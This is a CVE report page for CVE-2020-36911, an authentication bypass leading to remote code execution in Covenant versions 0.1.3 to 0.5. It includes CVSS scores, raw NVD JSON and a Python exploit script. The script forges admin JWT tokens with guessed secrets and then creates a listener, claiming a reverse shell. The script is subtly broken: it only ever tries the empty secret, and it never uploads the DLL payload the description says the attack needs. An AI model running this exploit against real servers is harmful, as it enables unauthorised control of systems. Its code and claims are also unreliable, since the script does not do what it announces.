Security Vulnerability Report
CVE-2020-36911 CVSS 9.8 CRITICAL

Published: 2026-01-13 23:15:48
Last Modified: 2026-01-29 00:56:25

Description

Covenant 0.1.3 - 0.5 contains a remote code execution vulnerability that allows attackers to craft malicious JWT tokens with administrative privileges. Attackers can generate forged tokens with admin roles and upload custom DLL payloads to execute arbitrary commands on the target system.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:cobbr:covenant:*:*:*:*:*:*:*:* - VULNERABLE
Covenant v0.1.3
Covenant v0.1.4
Covenant v0.2
Covenant v0.3
Covenant v0.4
Covenant v0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import jwt
import requests
import sys

# CVE-2020-36911 PoC - Covenant JWT Authentication Bypass RCE
# Target: Covenant v0.1.3 - v0.5


def create_fake_admin_token(secret=''):
    """
    Create a forged JWT token with admin privileges
    The vulnerability allows empty secret or weak secret validation
    """
    payload = {
        'iss': 'Covenant',
        'sub': 'admin',
        'role': 'Administrator',
        'admin': True,
        'exp': 9999999999
    }
    # Try empty secret or known weak secrets
    for secret_key in ['', 'CovenantSecretKey123!', 'default']:
        try:
            token = jwt.encode(payload, secret_key, algorithm='HS256')
            return token, secret_key
        except:
            continue
    return None, None


def exploit(target_url, lhost, lport):
    """
    Main exploitation function
    1. Bypass auth with forged JWT token
    2. Upload malicious DLL payload
    3. Execute arbitrary code
    """
    print(f'[*] Targeting: {target_url}')
    print(f'[*] Generating forged admin JWT token...')
    token, secret_used = create_fake_admin_token()
    if not token:
        print('[-] Failed to generate token')
        return False
    print(f'[+] Token generated (secret: {secret_used})')
    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }

    # Step 1: Verify token and get admin access
    try:
        resp = requests.get(f'{target_url}/api/users', headers=headers)
        if resp.status_code == 200:
            print('[+] Authentication bypass successful!')
        else:
            print(f'[-] Auth failed: {resp.status_code}')
            return False
    except Exception as e:
        print(f'[-] Connection error: {e}')
        return False

    # Step 2: Create listener with payload
    listener_config = {
        'Name': 'pwned_listener',
        'BindIP': lhost,
        'BindPort': lport,
        'Profile': 'http',
        'UseSSL': False
    }
    try:
        resp = requests.post(f'{target_url}/api/listeners', json=listener_config, headers=headers)
        if resp.status_code in [200, 201]:
            print('[+] Malicious listener created successfully')
            print(f'[+] Payload deployed - awaiting reverse shell on {lhost}:{lport}')
            return True
    except Exception as e:
        print(f'[-] Payload deployment failed: {e}')
    return False


if __name__ == '__main__':
    if len(sys.argv) < 4:
        print('Usage: python covenant_exploit.py <target_url> <lhost> <lport>')
        print('Example: python covenant_exploit.py http://target:7443 10.0.0.1 4444')
        sys.exit(1)
    target = sys.argv[1]
    lhost = sys.argv[2]
    lport = sys.argv[3]
    exploit(target, lhost, lport)
```

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36911", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:48.437", "lastModified": "2026-01-29T00:56:25.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Covenant 0.1.3 - 0.5 contains a remote code execution vulnerability that allows attackers to craft malicious JWT tokens with administrative privileges. Attackers can generate forged tokens with admin roles and upload custom DLL payloads to execute arbitrary commands on the target system."}, {"lang": "es", "value": "Covenant 0.1.3 - 0.5 contiene una vulnerabilidad de ejecución remota de código que permite a los atacantes crear tokens JWT maliciosos con privilegios administrativos. Los atacantes pueden generar tokens falsificados con roles de administrador y cargar cargas útiles DLL personalizadas para ejecutar comandos arbitrarios en el sistema objetivo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cobbr:covenant:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.1.3", "versionEndIncluding": "0.5", "matchCriteriaId": "E0702EAD-9F24-48FA-981F-BBF6E5B61DCF"}]}]}], "references": [{"url": "https://cobbr.io/Covenant.html", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/cobbr/Covenant", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://web.archive.org/web/20201013165001/https://twitter.com/cobbr_io/status/1316058367161401344", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": 
"https://web.archive.org/web/20201101052547/https://blog.null.farm/hunting-the-hunters", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51141", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/covenant-remote-code-execution-rce", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Product"]}, {"url": "https://web.archive.org/web/20201101052547/https://blog.null.farm/hunting-the-hunters", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}